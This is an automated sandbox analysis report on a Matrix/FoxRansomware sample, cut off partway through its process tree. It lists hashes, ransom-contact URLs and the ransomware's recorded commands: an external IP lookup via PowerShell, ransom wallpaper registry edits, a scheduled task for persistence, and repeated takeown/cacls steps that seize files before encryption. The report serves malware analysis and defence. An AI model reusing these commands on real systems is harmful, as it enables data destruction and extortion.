Analysis
- max time kernel: 150s
- max time network: 124s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- submitted: 13-02-2024 05:15
- Static task: static1
- Behavioral task behavioral1: Sample FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe, Resource win7-20231215-en
- Behavioral task behavioral2: Sample FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe, Resource win10v2004-20231215-en
- Behavioral task behavioral3: Sample FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe, Resource win7-20231215-en
- Behavioral task behavioral4: Sample FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe, Resource win10v2004-20231215-en
- Behavioral task behavioral5: Sample FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe, Resource win7-20231215-en
- Behavioral task behavioral6: Sample FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe, Resource win10v2004-20231215-en
- Behavioral task behavioral7: Sample FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe, Resource win7-20231215-en
- Behavioral task behavioral8: Sample FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe, Resource win10v2004-20231215-en
- Behavioral task behavioral9: Sample FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe, Resource win7-20231215-en
- Behavioral task behavioral10: Sample FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe, Resource win10v2004-20231222-en
- Behavioral task behavioral11: Sample FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe, Resource win7-20231215-en
- Behavioral task behavioral12: Sample FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe, Resource win10v2004-20231215-en
General
- Target: FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
- Size: 1.2MB
- MD5: c82d64850d35cc6a536c11adbd261cf6
- SHA1: 9f4d070a1b4668d110b57c167c4527fa2752c1fe
- SHA256: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
- SHA512: 777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
- SSDEEP: 24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef
Malware Config
Extracted
- http://myexternalip.com/raw
Extracted
- Path: C:\Program Files\Google\Chrome\Application\#KOK8_README#.rtf
- URLs: https://bitmsg.me, https://bitmsg.me/users/sign_up, https://bitmsg.me/users/sign_in
Signatures
Matrix Ransomware (64 IoCs)
Targeted ransomware with information collection and encryption functionality.
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
- pid 3296: bcdedit.exe
- pid 2348: bcdedit.exe
Blocklisted process makes network request (1 IoC)
- flow 9, pid 2460: powershell.exe
Drops file in Drivers directory (1 IoC)
- File created: C:\Windows\system32\Drivers\PROCEXP152.SYS (process: sOCkujKF64.exe)
Sets service image path in registry (2 TTPs, 1 IoC)
- Set value (str): \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" (process: sOCkujKF64.exe)
Executes dropped EXE (64 IoCs)
Loads dropped DLL (64 IoCs)
Modifies file permissions (1 TTP, 64 IoCs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops desktop.ini file(s) (40 IoCs)
Enumerates connected drives (3 TTPs, 44 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\IhklkhQE.bmp" reg.exe
Drops file in Program Files directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3376 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3348 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2460 powershell.exe 2760 sOCkujKF64.exe 2760 sOCkujKF64.exe 2760 sOCkujKF64.exe
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 2760 sOCkujKF64.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2148
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWaVfX3D.exe"2⤵PID:2400
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWaVfX3D.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWaVfX3D.exe" -n2⤵
- Executes dropped EXE
PID:2344
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Wo6r9M7V.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:3004
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IhklkhQE.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2664
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IhklkhQE.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:2292
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:2464
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:2848
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kixASbnx.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2888
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\kixASbnx.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:520
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\fMynkeEd.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:4012
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\fMynkeEd.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:3376
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1792
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:2236
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:3048
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1604
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:1760
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3952
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:852
C:\Users\Admin\AppData\Local\Temp\sOCkujKF64.exesOCkujKF.exe -accepteula "Dynamic.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2760
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:3252
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:2604
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵PID:3624
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2016
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2412
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1176
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:2292
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:3660
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:3316
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1588
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2632
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2268
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:1704
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:2356
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:108
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1468
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3232
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2316
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Loads dropped DLL
PID:1112
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1724
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3104
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2088
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:3172
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:2080
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:3720
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3240
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2236
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1952
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:3024
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:1584
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:2060
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3800
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:776
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3544
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵
- Loads dropped DLL
PID:4232
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:4260
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:4272
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵
- Loads dropped DLL
PID:4284
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵
- Executes dropped EXE
PID:4292
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4324
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:4352
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4376
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵PID:4392
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:4400
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:4428
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4456
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵
- Loads dropped DLL
PID:4488
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:4516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵
- Modifies file permissions
PID:4532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadCAD.otf" -nobanner3⤵
- Loads dropped DLL
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MyriadCAD.otf" -nobanner4⤵
- Executes dropped EXE
PID:4548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵
- Loads dropped DLL
PID:4600 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:4628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:4640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "create_form.gif" -nobanner3⤵
- Loads dropped DLL
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "create_form.gif" -nobanner4⤵
- Executes dropped EXE
PID:4656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵
- Loads dropped DLL
PID:4724 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:4748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵
- Modifies file permissions
PID:4768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "info.gif" -nobanner3⤵
- Loads dropped DLL
PID:4780 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "info.gif" -nobanner4⤵
- Executes dropped EXE
PID:4788
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵
- Loads dropped DLL
PID:4836 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:4864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵PID:4880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵
- Loads dropped DLL
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵
- Executes dropped EXE
PID:4904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵
- Loads dropped DLL
PID:4960 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:4984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "trash.gif" -nobanner3⤵
- Loads dropped DLL
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "trash.gif" -nobanner4⤵
- Executes dropped EXE
PID:5012
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵
- Modifies file permissions
PID:4996
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵
- Loads dropped DLL
PID:5076 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:5104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:5116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵
- Loads dropped DLL
PID:2600 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵
- Executes dropped EXE
PID:3276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵
- Loads dropped DLL
PID:3044 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵
- Loads dropped DLL
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵
- Executes dropped EXE
PID:3996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵
- Loads dropped DLL
PID:3412 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:3664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵
- Loads dropped DLL
PID:2828 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵
- Executes dropped EXE
PID:2372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵
- Loads dropped DLL
PID:3724 -
